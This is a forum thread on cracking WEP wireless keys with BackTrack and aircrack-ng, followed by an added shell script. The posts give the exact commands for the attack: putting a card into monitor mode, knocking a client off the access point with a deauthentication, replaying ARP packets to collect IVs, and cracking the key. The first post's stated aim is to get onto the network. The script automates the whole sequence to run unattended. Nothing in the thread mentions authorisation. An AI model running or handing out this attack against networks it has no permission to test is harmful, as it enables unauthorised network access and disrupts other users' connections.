BackTrack 2 WEP key cracking
I have got BackTrack 2 and I was confused on either the syntax of the commands themselves or whether I just didn't configure everything correctly. So, to help others, here is what I have. I run iwconfig and set the wireless card to listen (iwconfig wlan0 mode monitor). Next I need to run kismet (when I run kismet it tells me I need to configure it and to refer to the .doc; I did not know how, or where it was, but that's OK, there is an alternative: airodump), so I get it all set up (airodump wlan0 dump channel 1).
-new window- Now I need to inject the packets so I can increase the IVs rapidly. So I run (aireplay -0 10 -1 "MAC address of AP" -c "client MAC address" wlan0) {this was to kick the other user off of the AP and re-authenticate}.
-new window- Now to the injection (aireplay -3 -b "MAC address of AP" -h "client MAC address" -x 500 wlan0).
Now the numbers should increase. After a while, 500,000 IVs or so later, it's time to crack them.
-new window- (aircrack -a 1 -b "MAC address of AP" dump.ivs). This tells aircrack that it should be trying to break the key. Here is another method to use that is sometimes faster: (aircrack -a 1 -i 1 -n 64 -m "MAC address of client" -b "MAC address of AP" dump.ivs).
And now you should get a WEP key. Jot it down on a piece of paper, reboot to Windows and enter the key twice without the ":" and now you should be in!
(If anyone sees anything I need to add, or if there is an error, please let me know or edit it. Thx, Exidous) PS: I need a sig
For you to use kismet on BackTrack you have to edit kismet's conf: sudo kedit /usr/local/etc/kismet.conf
Find the line source=none,none,none, which is source=drivername,devicename,namegiven. For example, mine is the following, because I use the patched ipwraw drivers: source=ipw3945,wifi0,Intel
Others, for example, are: source=ipw3945,eth1,intel or source=orinoco,eth1,kismet, etc.
Then kismet will run, and run happy. Lucky you, having a card and drivers that inject and enter monitor mode nicely. Few are so fortunate.
hmm..
I've never had to get 500K IVs to crack a WEP key, usually just 50K; I usually go about it kinda like this:
airmon-ng start rausb0
airodump-ng rausb0
I find the target AP and a client that is on, then I use the client's MAC address in an ARP attack.
Then I restart airodump to capture the packets I want:
airodump-ng --channel 6 -w dumpfile rausb0
Then I start the ARP attack:
aireplay-ng -3 -b <AP MAC> -h <AP Client's MAC> rausb0
I wait until 50K IVs, then I crack it in less than a few seconds..
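As an added example (my own script, not code from any poster above and not part of the aircrack-ng project), the following strings together the airodump-ng / aireplay-ng / aircrack-ng steps from the first and last posts and adds the check both of them do by eye: it reads the IV count for the target BSSID out of airodump-ng's CSV output and loops until a threshold is reached before handing the capture to aircrack-ng. Assumptions that are mine rather than the thread's: aircrack-ng 1.x tool names and flags (aireplay-ng -0 with -a for the AP address for the deauth, -3 for the ARP replay, aircrack-ng -a 1 for WEP); the CSV column order, taken from the aircrack-ng 1.x source; the card already in monitor mode (airmon-ng start, as in the last post); the interface, AP MAC, client MAC and channel passed on the command line; and a constructed, not captured, CSV sample used only to exercise the parser offline.

```shell
#!/bin/sh
# Added example, not from the thread: strings the airodump-ng / aireplay-ng /
# aircrack-ng steps from the posts into one script, and replaces "watch the
# counter" with a loop that reads the IV count from airodump-ng's CSV output.
# Assumptions (mine): aircrack-ng 1.x names and flags; the card is already in
# monitor mode (airmon-ng start <card> [channel], as in the last post); the
# CSV column order below, taken from aircrack-ng 1.x; airodump-ng writes
# <prefix>-01.csv and <prefix>-01.cap in the current directory.

set -eu

# AP rows in airodump-ng's CSV (assumed layout, aircrack-ng 1.x):
# BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher,
# Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
# Print the "# IV" value for one BSSID; 0 if the file or the row is missing.
iv_count() {
    csv=$1
    bssid=$2
    [ -f "$csv" ] || { echo 0; return; }
    awk -F', *' -v b="$bssid" '
        { sub(/\r$/, "") }                       # CSV lines end in CRLF
        toupper($1) == toupper(b) && NF >= 11 { n = $11 + 0; found = 1 }
        END { print (found ? n : 0) }' "$csv"
}

# Exit 0 while the capture still holds fewer than $3 IVs for BSSID $2.
need_more_ivs() {
    [ "$(iv_count "$1" "$2")" -lt "$3" ]
}

# Constructed airodump-ng CSV (not a real capture) so iv_count can be
# exercised offline: one WEP AP with 51234 IVs, one WPA2 AP, one station.
write_sample_csv() {
    {
        printf 'BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key\r\n'
        printf '00:11:22:33:44:55, 2008-01-01 12:00:00, 2008-01-01 12:05:00,  6,  54, WEP , WEP, OPN, -40,  120,  51234, 0.  0.  0.  0,  5, myssid, \r\n'
        printf 'AA:BB:CC:DD:EE:FF, 2008-01-01 12:00:00, 2008-01-01 12:05:00,  1,  54, WPA2, CCMP, PSK, -70,  300,      0, 0.  0.  0.  0,  8, neighbor, \r\n'
        printf '\r\n'
        printf 'Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs\r\n'
        printf '66:77:88:99:AA:BB, 2008-01-01 12:01:00, 2008-01-01 12:05:00, -50,      300, 00:11:22:33:44:55, myssid\r\n'
    } > "$1"
}

# Live run: capture on one channel, deauth the client once so it re-associates
# and emits an ARP request, replay that ARP until the IV target is reached,
# then hand the capture to aircrack-ng.
main() {
    iface=$1 ap=$2 client=$3 channel=$4 prefix=${5:-dumpfile}
    target=${WEP_IV_TARGET:-50000}     # the last post finds 50K is usually enough
    csv="$prefix-01.csv"

    airodump-ng --bssid "$ap" --channel "$channel" -w "$prefix" "$iface" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 5
    aireplay-ng -0 5 -a "$ap" -c "$client" "$iface"     # -0 = deauth, -a = AP MAC
    aireplay-ng -3 -b "$ap" -h "$client" "$iface" >/dev/null 2>&1 &
    replay_pid=$!
    trap 'kill "$dump_pid" "$replay_pid" 2>/dev/null' EXIT

    while need_more_ivs "$csv" "$ap" "$target"; do
        printf 'IVs: %s / %s\n' "$(iv_count "$csv" "$ap")" "$target"
        sleep 10
    done
    aircrack-ng -a 1 -b "$ap" "$prefix-01.cap"
}

# Usage: sh wep-ivs.sh run <monitor iface> <AP MAC> <client MAC> <channel> [prefix]
# Without "run" the script only defines the functions (so they can be checked).
if [ "${1:-}" = run ]; then
    shift
    main "$@"
fi
```

The IV column is read from the CSV rather than from airodump-ng's screen so the loop can run unattended; the threshold is a starting point, not a guarantee, since the number of IVs aircrack-ng needs depends on the key length and on which IVs the capture happened to collect, so if aircrack-ng fails at the threshold simply raise WEP_IV_TARGET and rerun.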